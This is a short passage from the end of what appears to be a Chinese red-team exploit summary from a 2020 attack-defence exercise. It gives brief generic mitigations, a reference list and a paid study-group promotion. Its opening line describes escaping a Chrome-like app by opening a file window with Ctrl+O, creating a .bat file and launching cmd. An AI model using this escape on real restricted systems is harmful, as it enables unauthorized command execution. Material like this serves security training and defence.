如果有类似chrome的应用可以直接使用ctrl+o打开窗口, 然后新建bat, 起一个cmd或者其他的程序

8. 防护方法

1.及时更新补丁

2.升级到最新版

3.做好权限控制


-参考-

2020攻防演练弹药库

SaltStack认证绕过复现

CVE-2020-1350分析与复现【看雪论坛】

2020HVV红方漏洞利用总结

2020HVV红方漏洞利用总结「华盟学园」 知识星球现已开启! 一个学习网络安全知识和分享工具的星球,网络安全大佬在线分享技术文章,大家一起学习、共同进步!
如果你对我们星球内的分享的知识和工具感兴趣,可以随时加入我们的星球,安全大佬在里面等着你。
现在加入知识星球只需要:365/年(1天1元,星球内所有内容免费学习获取)。
加入星球:点击图片,扫描二维码,快快加入吧!

2020HVV红方漏洞利用总结

2020HVV红方漏洞利用总结

2020HVV红方漏洞利用总结

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: